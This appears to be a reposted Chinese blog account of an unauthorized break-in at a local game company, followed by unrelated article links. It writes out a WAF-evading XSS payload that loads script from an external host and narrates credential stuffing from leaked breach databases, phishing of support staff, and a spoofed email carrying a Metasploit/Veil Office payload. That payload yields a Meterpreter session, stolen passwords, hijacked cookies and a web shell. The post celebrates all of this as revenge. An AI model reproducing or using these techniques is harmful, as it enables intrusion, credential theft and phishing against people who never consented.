反射型XSS的逆袭之路
0×00背景
这是一次结合各自技巧的渗透过程,由于原作者的截图不多,我们只是简单叙述一下思路~
目标是一家本地的游戏公司,起因是找到一个反射型xss,但是却被对方公司忽略,而作者身边的一个妹子也在这家公司工作,便起了搞定这家公司的决心。
以下正片
=====================================================
0×01信息收集
目标公司:XX网络科技有限公司(XX游戏)
URL:http://www.xxxxcom.com
http://www.xxxxcom.cn(公司另一域名)
http://www.xxxxcom.cn.com(公司另一域名)
通过浏览主站和查询whois信息,得知其公司工作邮箱,域名所有人信息,HR联系方式等
结合社工库查询,综合得到目标公司一高管信息
工作邮箱直接查询到了密码,但是输入后提示密码错误,看来修改过,但仔细一看,均为有规律的弱口令
三个数字重复或者是键盘向下的方式组合的口令,于是我果断的决定根据这个规律碰撞一下其他密码试试
经过碰撞,把得到的密码丢到burpsuite重复提交到目标公司网站的登陆界面(本来想登录邮箱的,无奈网易有防止重复提交的策略)
跑了好一阵子,未果,碰撞密码,暂时搁浅
后来想起,whois信息中,域名是xinnet的,于是开心的去查询新网的裤子,不过查询结果很失望,密码依旧不对
至此第一次试探搁浅
0×02对目标网站的测试
目标站点进行cms指纹识别后反应是良精南方的,但是看了看用的是.net的 架构,想到去年和小伙伴领1w的原因就是因为发现该站点的漏洞,于是乎又折头看了看,shell已删除,并且管理后台重做过,去年是用的 admin.xxxxcom.com做的后台,现在看了看已经重做,只能放弃,不过好在菜刀还有缓存,通过缓存浏览了web目录下的大概情况,有个 bbs,一个前台,一个主站,均为.net架构,论坛更是Discuz!NT 3.6.711 出名的难日,浏览缓存后发现某目录下存在一富文本编辑器,访问后结果依旧不尽人意
果断放弃之,然后看了看去年找到的一个主站sql注入
装了新的安全狗,无力去继续绕过waf,放弃=。=
唔,那怎么办呢,接下来就对目标站点进行了FUZZ扫描,哟~好吧,就只扫到我之前说的那个xss,还是反射型的,不过突然想到目标公司的人说不就是个跨站么,这句话让我又不开心了起来,哥今天就拿这个屌丝反射型跨站逆袭给你看!
0×03反射型xss的逆袭之路(伪水坑攻击)
因为装了安全狗,所以要稍微进行攻击代码构造绕过一下
该反射构造的代码如下:
通过img标签构造iMg大小写的方式绕过,用onerror属性加 载,
1 |
onerror=eval(javascript:document.write(unescape( ' <script src="http://xxx.js"></script>' ));) |
对eval操纵的内容进行16进制编码后测试通过
之后进行了第一次攻击尝试
找到客服反馈问题,我说你们游戏的注册页面有问题啊,没办法注册,注册的地址是不是这个啊(然后发了经过短域名处理的攻击url)
一般情况,客服都会来解决问题,但是该公司客服非常奇葩。。。说:哦,我也不知道啊,要不你下载个客户端去注册吧。
经过我机智的对话,仍然没有让其点击连接(给客服大爷您跪了)
第一次水坑攻击尝试失败。。暂时搁浅
91ri.org注:所谓“水坑攻击”,是指黑客通过分析被攻击者的网络活动规律,寻找被攻击者经常访问的网站的弱点,先攻下该网站并植入攻击代码,等待被攻击者来访时实施攻击。文中只是将xss发送到对方那边,等待对方点击,实际上是不能称为水坑攻击的,只能算钓鱼??
0×04第二次信息收集
首次尝试接连受挫,我过了几天在群里打屁,正好那个在这家公司上班的妹子也在,我就顺口问了问公司的情况
大概收集到信息为:
公司员工办公电脑均为win7,文字处理软件有office和wps但是默认使用的是office,公司并没有规定统一
不过好消息是office是默认的,以前看大牛们玩apt的时候都会很流弊的拿出office的漏洞通过邮件攻击搞定一切
做了个简易的接收端,探测公司那边的组件和杀毒软件
通过骗取点击后,接收端收到了session的信息,现在掌握的信息为:office版本为2007,浏览器为IE8,杀毒软件360,以及IP出口
0×05最后的冲锋,反射型xss终于逆袭
一切基本就绪,天随人愿的是我这里正好也有公网ip
但是有360略蛋疼,不过上次听maple说veil比较牛逼,我office用的payload自然是来自msf,那么就结合veil碰碰运气吧。。
找了个fake-email发伪造邮件
大概内容就是一篇求职的,附带了doc,doc里带了msf生成的
为了保险起见,除了附件有doc外,我还在邮件内容里加了经过短域名处理的xss攻击连接
邮件发过去了,一直开着msf等消息,不过貌似人家周日的时候不上班
吓的我一直开着电脑,第二天大概十点过,msf这边有动静了,好吧,可以返回Meterpreter会话了,总算是摸到了目标公司的设备(尽管只是一台个人电脑)
不过运气真不错,不知道是veil的原因免杀了360还是因为人品比较好当时对方360没有开,反正会话是反弹到了,快速的翻了翻对方的盘符,在文档里找到一份对应用户密码的记录,type了一下快速记录下来后把马删了撤退走人(91ri.org:把账号密码存在本机简直是硬伤啊)
好消息一个接着一个,之前在邮件内容中写入的短域名xss也被触发了,果断用其cookie登录,不过比较可惜,因为是反射型,对方后台找不到,只登录了前台
通过前台并没有进入后台的地方,但是论坛和前台互通,所以,嘿嘿~~是个超级版主
0×06尾声
之后的事情就不用说了,shell到手,对应用户密码也在个人电脑上扒拉到,呵呵~
最后我溜达了一圈,把shell删了,走人,只为证明反射型xss也是可以屌丝逆袭高富帅的!
写下这篇文章,默默抽根手边的花玉溪,深藏功与名
强调:自本文发出之前,目标服务器和对方电脑的木马均已删除,本人并未做任何破坏
来自:91ri.org
反射型XSS的逆袭之路的更多相关文章
- RestTemplate的逆袭之路,从发送请求到负载均衡
上篇文章我们详细的介绍了RestTemplate发送请求的问题,熟悉Spring的小伙伴可能会发现:RestTemplate不就是Spring提供的一个发送请求的工具吗?它什么时候具有了实现客户端负载 ...
- 网管到CEO的10年逆袭之路
把我个人近一年来讲的技术人员如何成长的鸡汤课整理了出来,送给大家<网管到CEO的10年逆袭之路>
- 从前端到全栈:JavaScript逆袭之路
JavaScript如何做到上天入地无所不能?JavaScript真的能一统江湖吗? 背景 近年来,前端技术日新月异,前端已经不仅仅是网页,更多的开始由狭义向广义发展. 先后涌现出了具备后端能力的no ...
- 一个吊丝android个人开发者的逆袭之路
转眼间,一年多过去了,记得我开发第一款android应用的时候,那是在前年的冬天,我本人是做java的,android的学习和开发完全是业余爱好,从前年上半年到前年下半年大约花了半年的业余时间把and ...
- 安卓触控一体机的逆袭之路_追逐品质_支持APP软件安卓
显示性能参数 接口:RGB信号 分辨率:1024*600 比例16:9 显示尺寸(A.A.):222.72*(W)*125.28(H)mm 外围尺寸:235.0(W)*143.0(H)*4.5(T)m ...
- 程序人生|从网瘾少年到微软、BAT、字节offer收割机逆袭之路
有情怀,有干货,微信搜索[三太子敖丙]关注这个不一样的程序员. 本文 GitHub https://github.com/JavaFamily 已收录,有一线大厂面试完整考点.资料以及我的系列文章. ...
- 从门外汉到腾讯Android高级研发——一个半路出家菜鸟的艰难逆袭之路
我是在去年3月份加入腾讯公司,目前是腾讯公司某技术部门里面的一个小负责人,年薪月薪大税后概30K,谈不上多么厉害,但在回想自己半路出家学习编程,从一个销售到现在终于进入中国互联网顶尖公司,还是有些许感 ...
- python学习之路(一)屌丝逆袭之路
变量 ...
- Airbnb创始人:屌丝的逆袭之路
这位黑发小帅哥名叫Brian Chesky,是Airbnb的联合创始人. 如果在百度一下Airbnb,你就会看到如下事实:Airbnb,即Air Bed and Breakfast,中国名“空中食宿” ...
随机推荐
- jsp实现仿QQ空间新建多个相册名称,向相册中添加照片
工具:Eclipse,Oracle,smartupload.jar:语言:jsp,Java:数据存储:Oracle. 实现功能介绍: 主要是新建相册,可以建多个相册,在相册中添加多张照片,删除照片,删 ...
- bzoj2560 串珠子
Description 铭铭有n个十分漂亮的珠子和若干根颜色不同的绳子.现在铭铭想用绳子把所有的珠子连接成一个整体. 现在已知所有珠子互不相同,用整数1到n编号.对于第i个珠子和第j个珠子,可以选择不 ...
- 分布式键值存储系统ETCD调研
分布式键值存储系统ETCD调研 简介 etcd是一个开源的分布式键值存储工具--为CoreOS集群提供配置服务.发现服务和协同调度.Etcd运行在集群的每个coreos节点上,可以保证coreos集群 ...
- 使用wcf编写坐标字符串生成shapefile文件,在iis发布供前端调用
项目有一需求,需要由坐标字符串(格式:x,y,点名)生成shapefile,由于在前台开发类似功能比较麻烦而且也不适用,最终决定使用WCF来实现,不借助现有GIS软件,基于GDAL实现. 实现过程如下 ...
- 如何运行一个vue工程
在师兄的推荐下入坑vue.js ,发现不知如何运行GitHub上的开源项目,很尴尬.通过查阅网上教程,成功搭建好项目环境,同时对前段工程化有了朦朦胧胧的认知,因此将环境搭建过程分享给大家. 首先, ...
- jenkins 使用注意
在jenkins使用的时候,在输入文件地址的时候,文件各级目录不能有空格等特殊符号!否则报错!
- Linux下链接数据库图形化工具
(一).Linux环境下mysql的安装.SQL操作 Linux下安装MySQL (rmp --help) 基本步骤:上传软件->检查当前Linux环境是否已经安装,如发现系统自带的,先卸载-& ...
- 项目自动构建工具对比(Maven、Gradle、Ant)
Java世界中主要有三大构建工具:Ant.Maven和Gradle.经过几年的发展,Ant几乎销声匿迹.Maven也日薄西山,而Gradle的发展则如日中天. Maven的主要功能主要分为5点,分别是 ...
- IE6.0升级的两种通用代码
随着W3C组织开始针对新的Web标准提案日期的到来,HTML5以及CSS3的新时代即将到来,同时微软的Win8以及IE10的出现也带给了这个世界奇妙的结构. 微软早在不再给WinXP做技术支持时,IE ...
- 【转】c++ new操作符的重载
基本概念: 1. 操作符重载:C++支持对某个操作符赋予不同的语义 2. new操作符:申请内存,调用构造函数 关于c++ new操作符的重载 你知道c++ 的new 操作符和operator new ...